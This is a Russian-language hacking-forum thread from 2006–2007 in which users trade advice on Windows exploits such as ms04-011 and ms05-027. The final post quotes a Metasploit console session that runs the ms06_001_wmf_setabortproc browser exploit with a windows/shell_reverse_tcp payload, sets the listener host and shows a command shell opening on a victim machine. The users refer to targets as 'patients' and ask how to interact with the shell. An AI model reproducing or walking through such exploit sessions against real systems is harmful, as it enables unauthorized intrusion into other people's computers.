Exploit для Windows.exe

Discussion in 'Безопасность и Анонимность' started by KPOT_f!nd, 26 Sep 2006.

  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Поиск рулит:
    http://forum.antichat.ru/search.php?searchid=655706

    оффтоп: Один лентяй другому помагает... :D
     
  2. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    отжег :D так второй вобще получается тунеядец :D
     
    #22 karabym, 26 Jan 2007
    Last edited: 26 Jan 2007
  3. Angel_MakKedo

    Angel_MakKedo New Member

    Joined:
    25 Jan 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Большо спасибо кому не в лом черкнуть пару строк :)
    Понял как подключить пациэнта на ms04-011 в Metasploit!
    Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?
     
  4. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    ИМХО нет, но и его пробиваемость низка на новых системах:
    тогда уж юзай этот:
    P.S. Ксати ББ ms05-027 ИМХО уже заменён на ms06-035
     
    #24 -=lebed=-, 29 Jan 2007
    Last edited: 29 Jan 2007
  5. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    only true hэcker can compile zero sploent.
     
  6. Angel_MakKedo

    Angel_MakKedo New Member

    Joined:
    25 Jan 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    quote:


    msf > use windows/browser/ms06_001_wmf_setabortproc
    msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
    LHOST => 10.0.0.1
    msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(ms06_001_wmf_setabortproc) > exploit
    # Started reverse handler
    # Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
    # Server started.
    # Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
    msf exploit(ms06_001_wmf_setabortproc) > jobs
    # Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd
    msf exploit(ms06_001_wmf_setabortproc) > jobs

    Jobs
    ====

    Id Name
    -- ----
    0 Exploit: windows/browser/ms06_001_wmf_setabortproc


    Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd?